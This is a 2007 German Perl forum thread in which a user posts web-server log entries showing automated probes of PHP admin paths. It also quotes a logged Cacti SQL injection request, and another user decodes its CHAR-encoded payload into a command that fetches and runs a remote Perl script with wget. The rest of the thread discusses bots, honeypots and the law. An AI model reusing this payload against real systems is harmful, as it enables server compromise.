$foo.php (Sonstige Beiträge (auch Spaß und Sinnloses))

[thread]2121[/thread]

$foo.php

Leser: 2

bloonix

2007-07-13 02:58

User since
2005-12-17
1615 Artikel
HausmeisterIn

Ulkig isses... :)

Seit der Veröffentlichung meiner Homepage sind ja nun schon einige
Wochen vergangen und heute habe ich das erste mal einen Blick in die
Datenbank geworfen. Es ist schon seltsam, dass die meisten vermeintlichen
Angriffe immer nur irgendwas mit PHP zu tun haben.

Code: (dl )

 /1-2-3/process.php
 /123/process.php
 /acp/index.php
 /ADMIN/main.php
 /ads/adxmlrpc.php
 /Ads/adxmlrpc.php
 /adxmlrpc.php
 /AZenv/azenv.php
 /bestellen/index.php
 /blogs/xmlrpc.php
 /blog/xmlrpc.php
 /board/search.php
 /c99.phpmain.php
 /cacti/cmd.php
 /_caupo/index.php
 /caupo/index.php
 /clan/index.php
 /clanpge/index.php
 /cmd.php
 /cmd.phpmain.php
 /cms/index.php
 /database/main.php
 /datenbank/main.php
 /db/admin/main.php
 /dbadmin/main.php
 /db/dbadmin/main.php
 /db/db/main.php
 /db/dbweb/main.php
 /db/main.php
 /db/myadmin/main.php
 /db/pma2005/main.php
 /db/pMA2005/main.php
 /db/pma2006/main.php
 /db/pMA2006/main.php

Naja, die Liste zieht sich noch um Meilen weiter. Es sind sogar solche
Schmückerl dabei und auch nicht der Einzigste:

Code: (dl )

/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,3
2,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119
,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,4
7,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,1
12,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109
,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,1
16,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111

Ich finde es schon erschreckend, dass PHP so eine große Angriffsplattform
ist und leider ja auch nicht unberechtigt. Das ist ein ein weiterer Grund für
mich, weshalb ich nie und nimmer PHP verwenden werde.

Die Skript Kiddies hätten sich zudem die Mühe sparen können, wenn sie
sich einfach nur mal meinen Content angesehen hätten. Jeder weiß doch,
das ein Perler niemals PHP verwendet - meistens - und andersrum eben-
falls - zum Vergleich würde ein Linuxadmin wohl nie eine Windowsbüxe
administrieren oder GwenDragon würde niemals Froschpopo heiraten.
Nein, nein, das verträgt sich einfach nicht. ;)

Sorry, dass mal wieder über PHP gelästert wurde!

Viele Grüße,
opi

What is a good module? That's hard to say.
What is good code? That's also hard to say.
One man's Thing of Beauty is another's man's Evil Hack.

ptk

2007-07-13 10:37

User since
2003-11-28
3645 Artikel
ModeratorIn
[default_avatar]

[quote=opi,13.07.2007, 00:58]

Code: (dl )

/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,3
2,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119


,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,4
7,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,1


12,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109
,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,1


16,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111

[/quote]
Der letzte von den CHAR(...)-Aufrufen sieht übersetzt so aus:

Code: (dl )

rm -rf /tmp/desk.pl;wget www.shady.1sthost.org/desk.pl -O /tmp/desk.pl;perl /tmp/desk.pl;rm -rf /tmp/out > ./rra/suntzu.log

2007-07-13 11:51

User since
2003-08-04
12208 Artikel
Admin1

[quote=opi,13.07.2007, 00:58]Die Skript Kiddies hätten sich zudem die Mühe sparen können, wenn sie
sich einfach nur mal meinen Content angesehen hätten.[/quote]
das sind ja robots. denen bereitet es mehr mühe, sich vor einem angriff
den content anzusehen. aber ich denke mal, das weisst du auch.

es gibt nur sehr viele homepagebetreiber, die das wirklich nicht wissen
und dann sagen "ach, wer will den schon meine homepage hacken".
die denken, hinter jedem angriff steckt ein hacker in person.

Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
lesen: Wiki:

Wie frage ich & perlintro Wiki:

brian's Leitfaden für jedes Perl-Problem

Ronnie

2007-07-13 12:31

User since
2003-08-14
2022 Artikel
BenutzerIn
[default_avatar]

[quote=pq,13.07.2007, 09:51]"ach, wer will den schon meine homepage hacken".[/quote]
Ja, etwas was ich in meinen Admin-Zeiten gehasst habe wie die Pest. Netzwerke werden nicht angegriffen weil sich jemand für die Firma/Person interessiert, sondern weil es möglich ist. Aber das in manchen Schädel reinzubekommen ...

sid burn

2007-07-14 02:25

User since
2006-03-29
1520 Artikel
BenutzerIn

user image

[quote=Ronnie,13.July.2007, 10:31][quote=pq,13.07.2007, 09:51]"ach, wer will den schon meine homepage hacken".[/quote]
Ja, etwas was ich in meinen Admin-Zeiten gehasst habe wie die Pest. Netzwerke werden nicht angegriffen weil sich jemand für die Firma/Person interessiert, sondern weil es möglich ist. Aber das in manchen Schädel reinzubekommen ...[/quote]
Nicht weil es Möglich ist, sondern weil Angreifer damit eine Ressource haben. Entweder bauen sie dadurch Botnetze auf. Oder sie können auch darüber z.B. illegalen Content verteilen.

Neusten Filme, Spiele etc.

Ich denke aber ersteres kommt häufiger vor. Und in diesem Fall merkt man auch nichts. Da ein Angreifer ja nichts modifiziert. Den er Interessiert sich ja wirklich nicht für die Person. ^^ Es reicht ja schon wenn er den Server nutzen kann um von dort aus Angriffe zu starten.

Wenn die Polizei dann vor der Tür steht, wird man sich darüber bestimmt auch freuen. ;)\n\n

Nicht mehr aktiv. Bei Kontakt: ICQ: 404181669 E-Mail: perl@david-raab.de

GwenDragon

2007-07-14 12:29

User since
2005-01-17
14784 Artikel
Admin1

Für sowas gibt es Honigtöpfe, in welche die bösen Bubis (sind meist wenige Mädels) fallen. Da kannst dann gut die Angreifer loggen und automatisch IP- und URL-Blacklists erstellen und dann per Redirect auf localhost ins Leere laufen lassen. :cool:

die Drachin Gwen

Meine Perl-Artikel · perldev – verschiedene Perl-Versionen unter Windows starten

sid burn

2007-07-14 17:34

User since
2006-03-29
1520 Artikel
BenutzerIn

user image

[quote=GwenDragon,14.July.2007, 10:29]Für sowas gibt es Honigtöpfe, in welche die bösen Bubis (sind meist wenige Mädels) fallen. Da kannst dann gut die Angreifer loggen und automatisch IP- und URL-Blacklists erstellen und dann per Redirect auf localhost ins Leere laufen lassen. :cool:[/quote]
Honypots verhindern aber nicht das dein möglicherweiser unsicherer Rechner trotzdem von Skriptkiddies genutzt wird.

Zum anderen sind Honypots selber ja auch am Rande der Legalität. ;)

Aber eigentlich brauchen wir uns um Skript kiddies keine Gedanken mehr machen. Wurde durch den neuen Hackerparagraph doch sowieso verboten und ist jetzt alles illegal. ...

Nicht mehr aktiv. Bei Kontakt: ICQ: 404181669 E-Mail: perl@david-raab.de

View all threads created 2007-07-13 02:58.